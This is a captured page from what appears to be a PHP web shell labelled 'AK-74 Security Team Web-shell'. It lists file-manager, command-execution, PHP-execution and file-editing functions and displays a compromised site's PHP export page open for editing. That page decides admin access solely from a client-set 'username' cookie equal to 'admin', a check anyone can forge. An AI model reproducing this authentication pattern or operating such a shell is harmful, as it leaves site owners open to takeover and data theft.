.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<!DOCTYPE html> <html> <head> </head> <body> <?php //print_r($_COOKIE['username']); if($_COOKIE['username']=='admin'){ ?> <form action="export.php" method="post"> <!-- <B>Client</B> <input type="text" name="user"><br> <B>Date</B> <input type="text" name="Date"><br> <input type="submit" value="export">--> <table> <tr> <td> <B>Client</B></td> <td><input type="text" name="user"></td> <td> <input type="submit" value="export"></td> </tr> <tr> <td></td> </tr> </table> </form> <?}else { header('Location: index.php'); } ?> </body> </html>
Rename:
-